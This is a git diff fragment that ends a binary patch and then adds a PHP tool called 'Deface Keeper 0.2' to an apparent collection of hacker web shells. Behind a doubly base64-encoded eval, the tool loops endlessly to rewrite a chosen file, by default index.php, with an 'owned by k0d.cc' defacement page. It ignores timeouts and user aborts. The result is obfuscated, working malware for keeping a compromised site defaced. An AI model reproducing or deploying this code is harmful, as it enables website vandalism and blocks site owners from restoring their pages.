zp>Cbw+)2vhTVcLew__&;`{qThPsM*%eDd@UGSo=5g#FzCOO}D%45<(f*Jew9Cm_uo
z#!rd4<Fd2gkl6Q>CE07@Z~t9GUF~7?FhE$oPQ`uK_>-4==r)9e$*16!!v`w(OcjPm
zob5+<bU5r;c8YL{{0M`rfmj2F;9^h!UO#k)k67Ee7?A;UOW=M~(c~7@f`E3b9N5+r
zoQAMWQ%Pk!rD`R;3Fv5;BFVf+L#}PJo6_(41s@^r<)LhyQ_t4`DXSvlfyI?F{YJDS
z7Xibc^y0$`c(6fS+ZMgigp{$a9O;CB<XMWZNxvUtd3^+$?#I$3uToGg+k_xG-B>z`
zf)@Pj27327KvQsme3o%13DS4Wdl2Y2z|OXub&FK95s<=4>W6_wptbpzVPk5}V?Wc~
zFTk#-W`C=L9jPD1xtouuA8anhPDn&JZyxijf4$>aT50T1v#AL%M!!N^q&;=O#Nr#`
z@$45)jQnmQT{c1<8#~!m<6y99XPn||V;!)7Er*w*B>^NvFJN-#G9c=%01kCR)v?uw
zpod^5m5VSkUYWEwB|CO+RVrqF))=Yp(%}0!!^Rmg3)$2#w8s5=%ENPLcg!f)&9P(^
z42N<j19Bu5;alK1M{aY}c=ysm;GmY$y>Jh!9WlskYRVz4_B54TXTW26l97_NkY3j)
zq%+R#(~7h$5V++?u5P~b8$L#qt4K`vCR&*+9wrgVjh;))`BII!5;!9og%=?d7Syh)
zwt<dT-o{Cl{75iZ<izz7PIgnG#UlCJnx{58Qf#d%0tH^Xg<nXO7y7!oTA@x$pogAL
z#Cyw&T2W>q|IUYGV#2_oSB`rmy$1OSnQ>0p?ovWnoqlUyo((o*l{FnW$9fu|_=M%T
zC$VA%m-vm@7<QG<SU%q`vBGxtFu)<j$Qi8Z<C_i;$vo5j?Xr4f7xGcykc-Om_-Wa4
zMZgyLU>Le7V?`YWy}5s?U(h-*C(45F_2>%pby6MMeJQW+gCp_+=mwE|NR9m#+GoX>
zSo+~na$7K<O&IwVJr{$DC4#@eczj~=3M}vCi+0WwYpwg=x5gZqc84?pvD{?B=gaS8
z9Q-|?ga)3(dhDrb1y<UvsJ(MGvbX1BBqq6dKPsOjJD?B;m4lrRB@RWxl@S1_CeV-z
zvPqb(D081x(tV9M*HARl@|DcCD90DdGw;rd<Ef)!WuVO*^dSxJZ4~dXvQfo=O-lep
zh3?{U(eCvbt>zAXOnM;M{17~>FSL_qk_T|B%{5WB$VqNa#u~m`K3`Je*H$tTap^g`
zB((-ng$^qj{gnFJs7~hO;1R;!@si|3$=8lT6%RRYnrbw716+q}nCO65m7wSEcGBbt
zGC#{RET^5A$vc4Dfv*;uK1A3JPALd*S|*P=6FSx9zMAO3jcKR+v9bVkyHbP9i?m3J
zXhXpF?3^b?=K-mg2cK6BGnDiaWrTI>BBb;wFb6h13_RT~=`FR$O<ZWH9d-Oh?{XE>
z{w&>oL4f_n8Nc#Bbsa;vuCwgXV{3<FKMat3m6^SGYIFD+Zs^<Zr|oB@kXT(P)9dp#
zPlbAYfqWuwjr7>X#JWAE^J!-%m5r*`;_AWdkE~p`*^hXfh1|p%)`%vhEjBwF1C@H!
zT>Aa>&p>kVb&`UssqS4v-VQa`c)so!a95ojM~)K{)Hue}3@r4Uc-(=qtYMT18C*<k
z=OeVWNU+J$Ctq1FHSHV9yIz;ZuQcF{o0~52sP-vcydYMUvj*OM;(XjgY|a7MDce^H
ze&GpMu-<yweS&!f3+{+?=@{Y^`=#Pj--X$W=tDul1HFIDMYBYm>0JOYn;_jM(@f7g
zTUw71<PBvN=JZoZberZCcjTDNC`y>hN6liRWq39<l-U&i)zW>Bbe}5W>trYS2RI7v
za`%g6uKnzX)-;;c!vY$a1n<a?&vce;LyMqoBZFeIx{1HqZ1#uN<3&?U@;O-fT4M7-
zv8n5C6Lr*youA3$S#eZVl3WSBN@wAIyAKKzH`lg#Xs9!GNk|4VEk^G;t*xZiuNZ_s
z^cZZJ)9aUhL$j6f-v<=kr1RW64du<8rU#Q!t3vz-E3vyD?pl%N#!RL@T)qN~+kO&b
zfG5PKQ?BI)r)*lmxt~otK2LU$gAjm!$(L6bx0<X4tDbcaJWMXM48!`pQ}L2Z95CRZ
zqD;oX0O(^V1@&J1K5|L3pV?ndaRX_kgMm=g860N5Odh8)In?`pvZDud3d%t6?{S}x
zfB!7{SFZK+t)&<gclX<1SE0cap?TiC_)Tzeo>-=_p@u-a-L8RNw>jG~mPy*=4if+2
zyrn&n7CUOAboC@xhD`PICNCEWIMIFDXjK@gb1kKG%%VjYzUEmT@#u|7Ue8O2!1@wW
zUO(-Lb}5fkA0N%rFY5X<!6<>;a<jme_sFo~nKfCLuAaL2<R145nSVL22*tSOj`byO
zsJMuYlaF#Fq+JQ7efdtCuf+{2Ypd<A{M%qERAm=CAlaFC8IcMwO?UL2{A>~Z%3pq_
zrobuf+tq-c?Y@#^!27)qdYG#BO?^d5rnfjp7d$zK;?Rh5ND20X_P9_MaZ67IyO`K!
z#r%4#)T1(J{L-#F%YGzksye=5caLOqM0lgg1=)Kfh9NJn$hw)zSbG;fSE#@-C~dLp
z(w4IXNU6d)g)#?UzR|YgdlYvlFu!Xp7G^@bUac6G1r5(1KopKo)3XLO<#uo-zjUJ=
zQ8;@0{IR@G_%h?Wc9fLL^%W(ZeRw$BKCd*@Bpxis$Qe!LUM=g=4mpLC?<@4yY@GOW
zalUmma|>@S6PCDCZ}?VwRAK_r%YILhHsw3K*`p|DjUtUUN71_o&cAK7eGUV*!MAh5
zW`??;HvRK<bSeh#Y2l_V_@EaS`kCM2Um1XuOxnJiY6*tD;d+hGc9ux#(?Lad=8L1s
zRY@MXgF74dq|!RJ#5bBB7O_<+tUj2j@=wKj-^a@g1luaug5!CiHYvc7FOa%I&g5q(
z78<nnv&{Nn&LnNpVs~UEffK(qvRWuVj-Eu~LN>i_aYD%nT_6j`4eR_UBs$siT?)?&
zBtVM-5bC17ebKb@_ngA;H=H<Xnhf`CQnh?hnKs7EyuvmDQAfCwN3sD7rqlWph)*aE
zQ)X7Z35uz|<3h)sY!Ztv9_GaKGhdf+6M@dcVV1`NvcwOk!5Z^)%nJ-2B&$>@>NL4C
z=%%XaV~^eM_stfBL=u$0KO4Ihxia|(P4d<)BwpI(wJ9D@1`|4Q*t;+~O&e5m!y?4m
zz(IN5-~0R>-nNs7x&=fHIG+&#lmtuxnVwx%Oh4a=FUib7ky{dD3#nI(HYUm}qo(T!
zj3Z=azwaFt(O19{EMrnVzn+R5QW{JbYcq{ZKKD1KM$hGc+vya|TG^TL?MvKgX6-X!
zXH!htBf$GdKqc<1@|(<_@9>%NHGw%4&&j`CW-I3N<9Nt=AP%U2qkc~$)e+42aV}hY
z-8_$S^??r?Jv=KTAntfLfc8MvvMyRF#t~C@ScWjg7p~+WfW>iTH5c4?T!QcRK!e1h
z=dU+5vmmPC!)Q5-t*PVbK;G8Q#{N2XfuP<>&jcW$taj053fzyPQy`DpBlsz#^%2d)
zWEUaxFSySFyvQZWYz~udLty!hC)~$h4Ei{$R5-$Np^Stw(KKojrt$ppL+?KL9HAeC
zT1Le>jyG}W9Z}vhAa?~i;^;{T3f*d$CT?2sNsV6!bS?JDQ9DnGE~G@NPN1z}wlxZ6
zS&Dugz&|{vP<rM2DWD-%T=+{_MGpCSq1ZNZkg%IzC5j?tKJv`#mc=|Z7RpaK<b=eh
z`JpBJm-xY4S^h{quFOsVi%l9K)x|&dmBR|-_|MnYe>#8wJwZE%u#y4>a!*-#tGeNp
zVMv9xH%qnkpJQP@S`F9@;UPa~jy;Aezsgu;xy>={M21XV$?q(kKQXf$pgri$=!i$b
zRMH-@y$OshoI_rj{ycsgA}xi<diIf|Jx(pV=V6kJl$)!g?UOq#gE}a_d<ZAsfy^>r
z<_tpVc2FhaTesbT<qN&&kNv@Bs(#5T4sM(O0_gYn^g%8F<+?iBd9Pi!-^MY~9%(35
z-kU9FtDF5BNk8S*ug`WpbOqSg+7ghl_t)2|YAU0L6n^AWf#1l!8e(_thT<%>nf1tD
zP>7GgL|}jGzG#*r^H!)T*w~C?81%}=`hDF`tcga4*qFHK@M0>;&#gq#J!PEMG?a|0
zfvTVIYn<s46Ip20K=g5gW6~4`VnK-O!(!f-FcUI|?~8H5sOV#0a7&h9%M)DkP!NcW
zQ?sllGJ^Z&F1`=;GtW#W#)SB11~oD%gM04I`wr`flDIrB3L~P;E_N5b%KhK`e44ts
zZPH{v7}8dGOBdU)lTC);1SXQRL=5=35%fOuAlGB3alM$(W2;^v%LHKKjTjsLS;;Ih
z#HGqFGeIdvV~n*0f!9EmWmIW0))<k94pLa=-7#ZqFO~|}2)EHPbap-P9w8!Y@`B*T
z-W%y~#7a0huHk1<%A{Avp)Af#@C3-~wxB5@-6PT(e#vx3HjRE7V+7zr3)(Nw%Bh}q
zc9~Fa7|l_LHYv)&NQ$Y%M$J3rR=J56)mueb?k_S2d{s8Q_YA7cvY6cphUN^@*dI-e
zP=o-+->z@k1RB2H5f_|T-Lc={%OSdB@NsNXTvGV+IY0cpHfJf|=JHB$n{j6G=(k%X
z!F8d0ETahQ`o_Hw;9E2vV1HBQ*+eecE)8BCgmRFuhe=#50^PJ|fQ}6ci%ch#st`)k
zN`4AJEd4|%=2(c#&(RSoHF_T+pR?{*=f?hFo?snD{7tNQd|gIk1!qXb{nWr3NM0=c
zwGx@IN?Hy(_M;8N-f_IQa);207in~wrs`kgP1;#h-)O1z=qnB*2g%?;=M7{qKj0iQ
z&5;Kl6P)|x)ntcthShMA8$z@P3t;q*8>srlFlowiBW?lvX;GDWl$_V=SF<ZicD}a_
zpmng;DJ(pnpMA2%_EOUg6ErXD;(lz%<|#dA^>oNnygyptJM5D{U=>aNSOc5%@G)Tf
zS>K&&JEM^wkN$~r{r8J<lbyF*L;mhh+1`Qz2D*Q9<L_0_tP~z8#U^ireVBL)WSPYz
zy);MVN&{6f=}+gRS#-KT9%DtY-uwN;Jf=YkSThq%wJ}|Ol*l5g^H+>&Y0S%0THS=U
zC=1XUhapV=tt|8+;@2R{w|9rXKg40NKqM3~Mwo5mTz7S4?+>V?`w#IgxzAja;zQJa
zK=l!Ab3$(#V@ubC)i<E6A<4;-TfvPJfTM=U#27YN$9GYK0A!d`Qq8ytfl?z7l*~2k
zY(EW`10a$FP2^?s1|QWICxKzQv%6aH78%aE1vqwT@hLQeVkJtNJ7quG<*ZAo%a`*^
zRd*pQu&pqg)LCFW>?yq&gc(MKcbdumd$P1x%<MvGNeG#4VRh_{U8s7OouRnly|_`L
zc#v?);Z+Gyl94_P`y}||l_7v6ZutT+xO5BA;-5b}L4s2R&b1Z`z|pV^I%9YMrG-+2
z#O@7I-M;kI{XO%=ANCT}-x1nvt2fQq9<X`bEv*eyv+EH7J|ipoz!8#eG4dhS501CF
zm^(C&q%z{8+phEMHE4x*LWtG=0_lkgK?5$QFcBx5Hc-oafG%HgXsW}R(j)ww4D2e$
z13apoI6*T|<RxdtM=JR-%)Yi-R<$bFG&3sZCRon(^+%(c=Mh<}K1Ht53L4l;F*kXm
zVy}$O2);6yeP0G*GI%9`CM&iy$`}`KcdFXRo$|A=r;~`d0PNK9+pSqIui458qMquT
zeWCT1gV7<KKs5<V;XOgorEDLx0DlG|AdIe8HVJD1L#d42jXG=PFIv6z?3n0Knj4@O
zhN4mloMGjP2I|zPvA+2C_bflgGw<1!e;|2)3NkBa=LcvXB@ljy<T`!vR95IBI$>R^
z2TF(CIc}uIrwrzK-IuTP8N6kvB5cOE_y%_FM?QDEOwn0gcw+15OtOL=b<i+br=RKx
zuo9c(y}qS<RG77La#3v`k`H%UIU%M}R+>;1vjQHKU5wHXLc-?OpbunLDKTEr_ztD~
zEC5~ShVv*t*e-XgOYu8b6@AN6E!7sv2uXO~FCms14A>!(V?ZZ}d-_^)a*TnayUIGP
zWo@#IV(Ll%7H#Y5lG?8>^P@y=nY-(C`IoPgCdyYFI=bLY%ZXd2TXP@n%97c}bZhGb
z6<Y<l=#4dt?oIiAtnSX=H-7$AVqeXcoA*thcXvg1Wbo4oZxoLha<)Icw|j+0`Vo_-
zoA_U>Vsbla?e~}M)y)r|JQ9F&$Fle2J-ZEkf0sCOAD$|3>R{=-RW4lFEPh-QRp)dW
zH@!~w>1pWhe{yYEvdPxl4<!X>91%6s?6J>!@M!1eqGa8$dEr0S89Jn-`E2}Kc!%xP
zY(a$zk1rc1Gs`=kl&sX;*ID-MgI(W7CGRa!(%E@BUt~F?eO5l%V1MQD-UvOp4?i?6
zEsF~+t#f1Zzx~PNSG$YbV)=5{?<Yl9oUJ=5e(u1{-AlX9ACNfq=<c0Q9RF09W<K@3
zFL5RPoQ0c(?ZSzQ6}?8eiB6ABGNom(N^DTvue-|g?kAbjc*kYRmyAU0<`_;nX19ua
z8}Q`hdDCwN|2aSLZsLV0kB=NUGJW1_c_}4@raRS^y~hn&1GS8Q^(Ner>NAX4^zMq-
z`APCG)_>!=I<L#JU&{EA+ZBC7UG_b0OlRw&sxLK#7|lw2nJ{<qWWO!vru+!V*mtqh
z@8n8<i5nu!p)N}&yH@t^mH6*;^raVTc2rgU6FzZvju&(9%JZ*_O3+{MeZJx$?>Ez{
z6%8LaF=skV|GjKWfzFOcVSNtww>xcL@hhbMVRG-WOKohv`YFfH>UkwHzO&qM*2ntw
zgPezs3%(gP#n&3AGz(vud}Q0xtfh?he6=$)uGO9v$&#{RcAE44(PEwylZo>u+DyED
z>?YH!P0<PGgpMi1mD=ZPC^yV6?&skYd;TRlsPt^y-eZ>!-rUC5taslx{?pv0-*=sx
z{CWNHhpV$=G>-4Do_<gzdL4)SvwIGobnWgR{>%O5&5qAHAI>S7-f3Pg`R(}!{$m|G
zUR-|szR2W5vVxn*JT>uJFWZ#bWl9ys3pY$t6m?bPIdEz(bGxf_%jbuSUg)O^31uEC
zetITjCfDbeD@5BRWV~xWiI$&?nRs2kNRLmTk<I7%om=_y&c8JJY~&c)p~)fU8rh`s
zw?X9d{Q7@CpYQ+w@B06L@BcFfcr&wzFfcK2Fz{`Uw2ABXT|R}8fngaF0|Ore14C|p
zN_=r;aY<^fUPW$BXwbo|I|c%_<`?QEO1$_t&T&u_Su5n>l)$+(pop)l{92f{x7($%
z-P@P#6#K>ew?iPvgTu4#;J?LQw?fO44bIH|{;W6s*qaB{s~<>5srSlFyt_!HVV9Bc
z%GZK3f4)3tXZgS<>v?OHYK{K^eJh!X*L>2rIO}(RZOgo<^nXu*T(p~TN2KBB-i<Xm
zKC4+4YfH>Lwdlja4-pklp4#=aw(Tw2p7KR>@{(oI5s~Ke<ezeE>%Yg?Bfa>cPu!xf
z-2va@#k!}g39x?B`~5Dv*YnSnfv+PIbLO^iEuVL7u9lSiwt`<D=gh0KN;U~!yZ`SJ
z(V&m|3oo}?tx?v{y8J9~+MB4_ysK%)*FRmdLTlF5iM_Y3>Q&yT6l6PR5F}hOb!zOK
z`QPh*J^z=t<DGnayg>|q_~G*p-Rm#gf2}`UZU3iD<Q{+cUvH&6=DNO36KWGmE^Ajf
zSKJ8EDv^BZVk558KeMmu;U!tl_~WkEOM21@4H|MBHm5qx-LR;1!^J9>8s)pE<fI-t
zNP8H4$+#$ZVrxmHjKbp8_xt`c2Y53wi7-H7ka=6A&D$?CIeeQL7(CZPVh|XK42%p4
sAPNYO;<F&509h}#*azu==&b~rh@=;o76QCk*+BA4Kv)5!En7i60C3v3m;e9(

literal 0
HcmV?d00001

diff --git a/xakep-shells/others/tools/DefaceKeeper_0.2.php.txt b/xakep-shells/others/tools/DefaceKeeper_0.2.php.txt
new file mode 100644
index 0000000..27673f5
--- /dev/null
+++ b/xakep-shells/others/tools/DefaceKeeper_0.2.php.txt
@@ -0,0 +1,40 @@
+
+<html><title>Deface Keeper 0.2</title>
+<style>body{background-color:#333333;color:#999999;}
+input{color:#cccccc;
+border:1px solid #666666;
+background-color:#000000;
+}</style>
+<p align=center>
+<font face="Courier New" size="2">
+<p align=center>Deface Keeper 0.2</p>
+<p align=center>-=[definside editi0n]=-</p>
+</font>
+<b>//
+<pre>
+<form method="post" align="center">
+<img src="http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png" align="center">
+target fi1e:<br><input type="text" name="target" value="index.php"></br>
+s1eeep time:<br><input type="text" name="sleeep" value="1"></br>
+<input type="submit" value="Keep Deface" >
+
+Idea & Design: wt0vremr
+C0de & Release: Floord
+� 2010, <a href="http://www.k0d.cc">www.k0d.cc</a></form>
+<?php
+// Keeps your deface
+eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9kSEoxWlNrN0RRcHpa
+WFJmZEdsdFpWOXNhVzFwZENnd0tUc05DbWxtS0NGbGJYQjBlU2drDQpYMUJQVTFSYkozUmhjbWRs
+ZENkZEtTa05DbnNOQ25kb2FXeGxLSFJ5ZFdVcERRcDdEUW9rWm5BZ1BTQm1iM0JsYmlna1gxQlBV
+MVJiDQpKM1JoY21kbGRDZGRMQ0FuZHljcE93MEtKR1JsWm1GalpTQTlJQ0k4YUhSdGJENDhhR1Zo
+WkQ0OGRHbDBiR1UrTUhkdVpXUWdZbmtnDQphekJrTG1OalBDOTBhWFJzWlQ0OEwyaGxZV1ErUEhB
+Z1lXeHBaMjQ5WENKalpXNTBaWEpjSWo0OGFXMW5JSE55WXoxb2RIUndPaTh2DQpaMjl2WjJ4bExt
+NXRMbkoxTDJsdFlXZGxjeTloZG1GamNtOTNNUzVxY0djK1BDOXBiV2MrUEdadmJuUWdabUZqWlQx
+Y0lrTnZkWEpwDQpaWEpjSWo0OGNDQmhiR2xuYmoxY0ltTmxiblJsY2x3aVBqeGlQbVJsWm1GalpT
+QmllU0JyTUdRdVkyTWdkR1ZoYlR3dllqNDhMM0ErDQpQQzltYjI1MFBqd3ZjRDQ4TDJKdlpIaytQ
+QzlvZEcxc1BpSTdEUXBtZDNKcGRHVW9KR1p3TENBa1pHVm1ZV05sS1RzTkNtWmpiRzl6DQpaU2dr
+Wm5BcE93MEtjMnhsWlhBb0pGOVFUMU5VV3lkemJHVmxaWEFuWFNrN0RRcDlEUXA5IikpOw=="));
+?>
+</b></pre>
+</p>
+</html> 
\ No newline at end of file